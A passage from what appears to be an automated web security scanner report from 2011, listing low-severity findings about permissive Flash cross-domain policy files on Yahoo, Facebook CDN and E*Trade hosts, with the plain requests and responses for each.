GET /crossdomain.xml HTTP/1.0
Host: shopping.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-template

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.84. http://sports.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sports.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host
Last-Modified: Mon, 28 Sep 2009 17:09:24 GMT
Accept-Ranges: bytes
Content-Length: 346
Content-Type: application/xml
Age: 0
Via: HTTP/1.1 r5.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mlb.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" secure="false" />
...[SNIP]...

3.85. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:41 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.86. https://us.etrade.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.etrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:08 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 16:10:27 GMT
ETag: "119-4cbdc2f3"
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=60, max=399
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.etrade.com" />
<allow-access-from domain="a248.e.akamai.net" />
<allow-access-from domain="*.etradegrp.com" />
...[SNIP]...

3.87. http://video.music.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml</